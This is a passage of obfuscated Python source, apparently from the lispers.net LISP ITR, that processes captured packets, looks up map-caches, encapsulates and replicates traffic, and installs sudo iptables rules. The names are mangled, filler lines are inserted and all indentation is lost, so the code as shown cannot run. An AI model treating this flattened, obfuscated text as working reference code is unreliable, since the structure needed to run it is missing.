if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
if ( my_sa ) : input_interface = device
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
Iii = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , Iii )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if ( device != input_interface and device != "lispers.net" ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
return
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
O0OO0oOoO0O0O = lisp . lisp_decent_push_configured
if ( O0OO0oOoO0O0O ) :
oo000oOo0 = packet . inner_dest . is_multicast_address ( )
iIiI1I1Ii = packet . inner_source . is_local ( )
O0OO0oOoO0O0O = ( iIiI1I1Ii and oo000oOo0 )
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if ( O0OO0oOoO0O0O == False ) :
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
O00o00O = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( O00o00O ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , O00o00O , oO0oIIII )
else :
ii1iii11i1 = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( ii1iii11i1 ,
input_interface ) )
return
if 4 - 4: IiII . IiII % I1ii11iIi11i % Ii1I / Ii1I
if 29 - 29: Oo0Ooo * ooOoO0o * I1ii11iIi11i / i11iIiiIii
if 26 - 26: IiII % I1Ii111 % oO0o % Ii1I
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 55 - 55: ooOoO0o % OoooooooOO / OoooooooOO % OoooooooOO
if 52 - 52: I1ii11iIi11i + I1ii11iIi11i . II111iiii
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
if 22 - 22: i1IIi + Ii1I
if ( packet . inner_version == 4 ) :
O0o0O0OO00o , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
  if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured ( ) == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 79 - 79: Ii1I . OoO0O00
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
iiIii1I = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( iiIii1I and IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
i1I11iIiII = packet . inner_dest
i1I11iIiII . instance_id = iiIii1I
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , i1I11iIiII )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
if 17 - 17: oO0o
if 22 - 22: I11i + iIii1I11I1II1
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
if ( IiIIiIIIiIii == None or IiIIiIIIiIii . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_source ,
packet . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 57 - 57: I11i
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
if 67 - 67: OoO0O00 . ooOoO0o
return
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if ( IiIIiIIIiIii and IiIIiIIIiIii . is_active ( ) and IiIIiIIIiIii . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( IiIIiIIIiIii . print_eid_tuple ( ) , False ) ) )
if 53 - 53: Ii1I % Oo0Ooo
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
IiIIiIIIiIii . last_refresh_time = time . time ( )
IiIIiIIIiIii . stats . increment ( len ( packet . packet ) )
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
IiiIIiiiiii , OOOO0o , i1I1iIi1IiI , i1111 , O0O000OOOo , i11ii1Ii1 = IiIIiIIIiIii . select_rloc ( packet , oO0oIIII )
if 25 - 25: OOooOOo
if 83 - 83: I1Ii111
if ( IiiIIiiiiii == None and O0O000OOOo == None ) :
if ( i1111 == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "not an EID" )
if 50 - 50: IiII % i1IIi
return
if 21 - 21: OoooooooOO - iIii1I11I1II1
OO0OoOOO0 = "No reachable RLOCs found"
lisp . dprint ( OO0OoOOO0 )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = OO0OoOOO0 )
return
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if ( IiiIIiiiiii and IiiIIiiiiii . is_null ( ) ) :
OO0OoOOO0 = "Drop action RLOC found"
lisp . dprint ( OO0OoOOO0 )
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = OO0OoOOO0 )
return
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
packet . outer_tos = packet . inner_tos
packet . outer_ttl = 32 if ( O0o0O0OO00o ) else packet . inner_ttl
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if ( IiiIIiiiiii ) :
packet . outer_dest . copy_address ( IiiIIiiiiii )
oO0oooooo = packet . outer_dest . afi_to_version ( )
packet . outer_version = oO0oooooo
o0OO0Oo = lisp . lisp_myrlocs [ 0 ] if ( oO0oooooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 3 - 3: I1Ii111 - O0 % iIii1I11I1II1 / IiII . o0oOOo0O0Ooo
packet . outer_source . copy_address ( o0OO0Oo )
if 3 - 3: O0 % OoooooooOO / OOooOOo
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , rloc_entry = i11ii1Ii1 ) == False ) : return
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if ( packet . encode ( i1I1iIi1IiI ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
II1i11i1iIi11 = Oooo0000 if oO0oooooo == 6 else Ii1IIii11
packet . send_packet ( II1i11i1iIi11 , packet . outer_dest )
if 83 - 83: Ii1I
elif ( O0O000OOOo ) :
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
IIIiiiI = O0O000OOOo . rle_nodes [ 0 ] . level
OoO00oo00 = len ( packet . packet )
for Oo0Oo0O in O0O000OOOo . rle_forwarding_list :
if ( Oo0Oo0O . level != IIIiiiI ) : return
if 44 - 44: OoooooooOO % OoooooooOO
packet . outer_dest . copy_address ( Oo0Oo0O . address )
if ( O0OO0oOoO0O0O ) : packet . inner_dest . instance_id = 0xffffff
oO0oooooo = packet . outer_dest . afi_to_version ( )
packet . outer_version = oO0oooooo
o0OO0Oo = lisp . lisp_myrlocs [ 0 ] if ( oO0oooooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 35 - 35: iII111i / I1ii11iIi11i * OoooooooOO . II111iiii / Oo0Ooo
packet . outer_source . copy_address ( o0OO0Oo )
if 1 - 1: OoooooooOO + IiII . i1IIi % I11i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 66 - 66: o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
if 12 - 12: iII111i . IiII . OoOoOO00 / O0
if ( packet . encode ( None ) == None ) : return
if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
packet . print_packet ( "Replicate-to-L{}" . format ( Oo0Oo0O . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
OooOoOOo0oO00 = len ( packet . packet ) - OoO00oo00
packet . packet = packet . packet [ OooOoOOo0oO00 : : ]
if 73 - 73: iII111i / I1ii11iIi11i % I1ii11iIi11i * I11i / I1ii11iIi11i
if 8 - 8: Ii1I
if 35 - 35: IiII + i1IIi * oO0o - Ii1I . Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
del ( packet )
return
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
if 83 - 83: OOooOOo
if 12 - 12: i1IIi . i1IIi - o0oOOo0O0Ooo
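# pcap callback: compute the layer-2 header offset (loopback, the lispers.net
# tap, ethernet, or VLAN), optionally log the frame, drop ARP, and pass the
# IP payload plus MAC info to the data-plane handler above.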
def ii1iIIiii1 ( device , not_used , packet ) :
ooOo0O0o0 = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if 65 - 65: ooOoO0o + O0
if ( lisp . lisp_frame_logging ) :
IiII1iiI = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
iII = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( IiII1iiI , iII ) )
if 63 - 63: o0oOOo0O0Ooo * iII111i
if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
if 21 - 21: o0oOOo0O0Ooo
if 81 - 81: I11i / iIii1I11I1II1 - ooOoO0o * I1Ii111 . I1IiiI * I1ii11iIi11i
o0000 = ""
i111i1i = False
OOo0oO00ooO00 = device
if ( ooOo0O0o0 == 14 ) :
iIiIIi1 , IiIii1I1I , OO0Oooo0oo , i111i1i = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
o0000 = lisp . lisp_format_macs ( IiIii1I1I , OO0Oooo0oo )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : ooOo0O0o0 += 4
if 42 - 42: Ii1I * I1Ii111 . IiII * I1IiiI + OoOoOO00
if 25 - 25: I11i . I1IiiI + oO0o
if 75 - 75: IiII - o0oOOo0O0Ooo % iII111i + i11iIiiIii
if 100 - 100: I11i + o0oOOo0O0Ooo - i11iIiiIii - II111iiii
if 40 - 40: OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if ( int ( OO0Oooo0oo [ 1 ] , 16 ) & 1 ) : i111i1i = True
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if ( ooOo0O0o0 != 0 ) :
oOo0OOoooO = struct . unpack ( "H" , packet [ ooOo0O0o0 - 2 : ooOo0O0o0 ] ) [ 0 ]
oOo0OOoooO = socket . ntohs ( oOo0OOoooO )
if ( oOo0OOoooO == 0x8100 ) :
iIi1iIIIiIiI = struct . unpack ( "I" , packet [ ooOo0O0o0 : ooOo0O0o0 + 4 ] ) [ 0 ]
iIi1iIIIiIiI = socket . ntohl ( iIi1iIIIiIiI )
OOo0oO00ooO00 = "vlan" + str ( iIi1iIIIiIiI >> 16 )
ooOo0O0o0 += 4
elif ( oOo0OOoooO == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if ( lisp . lisp_l2_overlay ) : ooOo0O0o0 = 0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
O0oOo00o0 ( packet [ ooOo0O0o0 : : ] , device , OOo0oO00ooO00 , o0000 , i111i1i )
return
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
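# Install iptables/ip6tables rules in a "lisp" chain off raw PREROUTING:
# accept loopback, multicast, link-local, local-address, and EID-to-EID
# traffic, and drop other EID-sourced packets that this process captures.
# Honors the LISP_NO_IPTABLES override and adds a checksum-fill workaround
# when LISP_VIRTIO_BUG is set.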
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
III1Ii1i1I1 = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
III1Ii1i1I1 += sources + lisp . lisp_get_all_addresses ( )
for O0O00OooO in III1Ii1i1I1 :
if ( lisp . lisp_is_mac_string ( O0O00OooO ) ) : continue
I1IiI1iI11 = "" if O0O00OooO . find ( ":" ) == - 1 else "6"
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , O0O00OooO ) )
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
if 17 - 17: Ii1I
if 39 - 39: ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if ( lisp . lisp_pitr == False ) :
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
iiI1iI1I = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
if ( II11 in dyn_eids ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and II11 . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and II11 . find ( ":" ) == - 1 ) : continue
if ( commands . getoutput ( iiI1iI1I . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) ) == "" ) :
continue
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) )
if 55 - 55: ooOoO0o
if 82 - 82: I1Ii111 - OOooOOo + OoO0O00
if 64 - 64: o0oOOo0O0Ooo . O0 * Ii1I + OoooooooOO - Oo0Ooo . OoooooooOO
if 70 - 70: Oo0Ooo - oO0o . iIii1I11I1II1 % I11i / OoOoOO00 - O0
if 55 - 55: iII111i - OoO0O00
if 100 - 100: O0
if 79 - 79: iIii1I11I1II1
O00oO0o = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for II11 in sources :
if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
os . system ( O00oO0o . format ( I1IiI1iI11 , II11 ) )
if 15 - 15: I1Ii111 + I11i . OoooooooOO . i11iIiiIii
if 31 - 31: OoooooooOO + iII111i - OoOoOO00 . i1IIi % iII111i
if 43 - 43: OOooOOo * ooOoO0o / iIii1I11I1II1 - Ii1I * Ii1I
if 60 - 60: iIii1I11I1II1 . OOooOOo + I1ii11iIi11i
if 44 - 44: O0 . oO0o * i11iIiiIii % i11iIiiIii + O0 / OOooOOo
o00oOOO0Ooo = commands . getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
o00oOOO0Ooo += commands . getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( o00oOOO0Ooo ) )
if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
Oo00ooO0OoOo = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 99 - 99: OoOoOO00
Oo00ooO0OoOo += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 77 - 77: o0oOOo0O0Ooo
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 65 - 65: OoOoOO00
os . system ( Oo00ooO0OoOo )
I1iI11I1III1 = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( I1iI11I1III1 , Oo00ooO0OoOo ) )
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
return
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
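# Build the pcap filter string: exclude ARP, match frames sourced from the
# configured EID-prefixes (or any frame for an L2 overlay), exclude traffic
# destined to non-dynamic EIDs or to this host's own addresses, and always
# include the RLOC-probe and multicast sub-filters.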
